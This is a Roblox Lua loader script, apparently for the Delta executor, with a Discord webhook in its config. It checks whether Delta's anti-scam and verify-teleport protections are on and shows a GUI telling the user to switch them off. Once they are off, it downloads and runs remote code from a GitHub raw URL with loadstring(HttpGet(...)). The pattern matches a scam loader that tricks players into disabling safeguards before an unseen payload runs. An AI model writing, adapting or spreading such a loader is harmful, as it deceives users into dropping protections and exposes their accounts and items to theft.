-- =========================================
-- CONFIG
-- =========================================
getgenv().Webhook  = "https://discord.com/api/webhooks/XXXX"
getgenv().Username = "GHOSS23"

local MAIN_SCRIPT_URL = "https://raw.githubusercontent.com/changelog-modul/test/refs/heads/main/test"
local RETRY_DELAY = 5 -- detik

-- =========================================
-- SERVICES
-- =========================================
local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local HttpService = game:GetService("HttpService")
local StarterGui = game:GetService("StarterGui")

-- =========================================
-- SAFE PROTECTION DETECTION (ANTI 773)
-- =========================================

-- ✅ AMAN: TIDAK MELAKUKAN TELEPORT
local function testTeleportProtection()
    local success = pcall(function()
        return TeleportService:GetPlayerPlaceInstanceAsync(
            Players.LocalPlayer.UserId
        )
    end)

    -- Jika fungsi diblokir executor → Verify Teleport aktif
    return not success
end

-- ✅ AMAN: HTTP TEST NORMAL
local function testHttpProtection()
    local success = pcall(function()
        game:HttpGet("https://www.roblox.com")
    end)

    return not success
end

local function checkProtection()
    local tpBlocked = testTeleportProtection()
    local httpBlocked = testHttpProtection()
    return tpBlocked, httpBlocked
end

-- =========================================
-- GUI SYSTEM (LIVE STATUS)
-- =========================================
local statusGui, statusText

local function updateStatus(tpBlocked, httpBlocked)
    if not statusText then return end

    local text =
        "STATUS PROTEKSI DELTA (LIVE)\n\n" ..
        (tpBlocked and "✅ Verify Teleport : AKTIF\n" or "❌ Verify Teleport : NONAKTIF\n") ..
        (httpBlocked and "✅ Anti-Scam / HTTP : AKTIF\n" or "❌ Anti-Scam / HTTP : NONAKTIF\n") ..
        "\n\nScript akan melanjutkan otomatis saat semua NONAKTIF..."

    statusText.Text = text
end

local function createGui()
    local player = Players.LocalPlayer

    local gui = Instance.new("ScreenGui")
    gui.Name = "DeltaProtectionLive"
    gui.ResetOnSpawn = false
    gui.Parent = player:WaitForChild("PlayerGui")
    statusGui = gui

    local frame = Instance.new("Frame")
    frame.Size = UDim2.new(0.85, 0, 0.48, 0)
    frame.Position = UDim2.new(0.075, 0, 0.26, 0)
    frame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
    frame.Parent = gui
    frame.BorderSizePixel = 0
    frame.Active = true
    frame.Draggable = true
    Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 14)

    local title = Instance.new("TextLabel")
    title.Size = UDim2.new(1, 0, 0.18, 0)
    title.Text = "⚠️ DELTA PROTECTION DETECTED"
    title.Font = Enum.Font.GothamBold
    title.TextSize = 22
    title.TextColor3 = Color3.fromRGB(255, 90, 90)
    title.BackgroundTransparency = 1
    title.Parent = frame

    local desc = Instance.new("TextLabel")
    desc.Size = UDim2.new(1, -30, 0.55, 0)
    desc.Position = UDim2.new(0, 15, 0.2, 0)
    desc.TextWrapped = true
    desc.TextYAlignment = Enum.TextYAlignment.Top
    desc.Font = Enum.Font.Gotham
    desc.TextSize = 16
    desc.TextColor3 = Color3.fromRGB(210, 210, 210)
    desc.BackgroundTransparency = 1
    desc.Parent = frame
    statusText = desc

    local openBtn = Instance.new("TextButton")
    openBtn.Size = UDim2.new(0.9, 0, 0.15, 0)
    openBtn.Position = UDim2.new(0.05, 0, 0.78, 0)
    openBtn.Text = "OPEN DELTA SETTINGS"
    openBtn.Font = Enum.Font.GothamBold
    openBtn.TextSize = 15
    openBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
    openBtn.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
    openBtn.Parent = frame
    Instance.new("UICorner", openBtn)

    openBtn.MouseButton1Click:Connect(function()
        StarterGui:SetCore("SendNotification", {
            Title = "Delta Settings",
            Text = "Matikan fitur berikut:\n- Anti-Scam Protection\n- Verify Teleport",
            Duration = 6
        })
    end)
end

-- =========================================
-- AUTO RETRY LOOP + AUTO CONTINUE
-- =========================================
local function protectionWatcher()
    createGui()

    while true do
        local tpBlocked, httpBlocked = checkProtection()
        updateStatus(tpBlocked, httpBlocked)

        if not tpBlocked and not httpBlocked then
            warn("All Delta protection OFF, executing main script...")

            if statusGui then
                statusGui:Destroy()
            end

            loadstring(game:HttpGet(MAIN_SCRIPT_URL))()
            break
        end

        task.wait(RETRY_DELAY)
    end
end

-- =========================================
-- INITIAL BOOT
-- =========================================
protectionWatcher()
